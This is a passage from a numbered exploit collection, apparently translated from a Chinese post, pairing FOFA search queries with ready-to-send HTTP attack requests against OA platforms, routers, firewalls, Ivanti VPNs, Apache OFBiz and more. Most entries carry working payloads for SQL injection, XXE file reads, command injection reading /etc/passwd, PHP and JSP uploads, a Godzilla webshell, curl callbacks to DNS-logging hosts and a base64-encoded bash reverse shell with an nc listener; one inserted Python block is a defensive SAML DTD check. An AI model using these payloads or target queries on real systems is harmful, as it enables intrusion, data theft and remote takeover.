User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP success command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec mobile-campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata 天耀 software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The EXP request is as follows; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision IP network intercom/broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision operations management center session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi An Xin Legendsec SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QAX 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then fetch the uploaded file (same filename as in the upload request) to confirm:
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA: app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the serialized payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA: app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA: body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA: app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA: app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA: icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA: body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA: body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/><ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/></ds:SignedInfo><ds:SignatureValue>qwerty</ds:SignatureValue><ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/></ds:KeyInfo><ds:Object></ds:Object></ds:Signature></soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA: body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML (a parameter entity whose SYSTEM identifier points at a DNS-logging host, so a callback proves the external entity was resolved):
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
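A pre-parse gate for entry 103, as an added example that is not code from the original post or from Ivanti: decode a SAMLRequest parameter (plain base64 as in the PoC, or the raw-DEFLATE form the HTTP-Redirect binding uses) and refuse any document that carries a DOCTYPE or ENTITY declaration before it ever reaches the XML parser. The base64 value is the one from the entry above; the clean AuthnRequest used for comparison is constructed for this example. The gate complements, and does not replace, running the real parser with DTD loading disabled.

```python
import base64
import re
import zlib

# SAMLRequest value copied from entry 103 above (the page's own PoC parameter).
PAGE_SAMLREQUEST = (
    "PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0K"
    "ICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg=="
)

# Any internal subset or entity declaration is enough to reject: a SAML
# AuthnRequest never legitimately needs a DTD.
_DTD_MARKER = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def decode_saml_request(value):
    """Base64-decode a SAMLRequest and inflate it when it is the deflated
    form used by the HTTP-Redirect binding (a plain value starts with '<')."""
    raw = base64.b64decode(value)
    if not raw.lstrip().startswith(b"<"):
        raw = zlib.decompress(raw, -15)        # raw DEFLATE, no zlib header
    return raw


def encode_saml_request(xml_bytes, deflate=False):
    """Inverse of decode_saml_request; used here only to build clean inputs."""
    if deflate:
        comp = zlib.compressobj(9, zlib.DEFLATED, -15)
        xml_bytes = comp.compress(xml_bytes) + comp.flush()
    return base64.b64encode(xml_bytes).decode("ascii")


def has_dtd(xml_bytes):
    return _DTD_MARKER.search(xml_bytes) is not None


def check_saml_request(value):
    """Run before the SAML parser. Returns (accepted, reason)."""
    try:
        xml = decode_saml_request(value)
    except (ValueError, zlib.error) as exc:      # binascii.Error is a ValueError
        return False, f"undecodable SAMLRequest: {exc}"
    if has_dtd(xml):
        return False, "DTD or entity declaration present (possible XXE)"
    return True, "ok"


if __name__ == "__main__":
    # Constructed clean request for comparison with the page's PoC value.
    clean = (b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
             b'ID="_1" Version="2.0" IssueInstant="2024-01-01T00:00:00Z"/>')
    for label, value in [("page PoC", PAGE_SAMLREQUEST),
                         ("clean POST", encode_saml_request(clean)),
                         ("clean redirect", encode_saml_request(clean, deflate=True))]:
        print(f"{label:15s} -> {check_saml_request(value)}")
```

The regex runs on bytes so a declaration cannot hide behind a declared-but-wrong charset; the only thing the gate does not see through is a SAMLRequest that is itself encrypted, which is not how this endpoint receives it.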

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA: title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
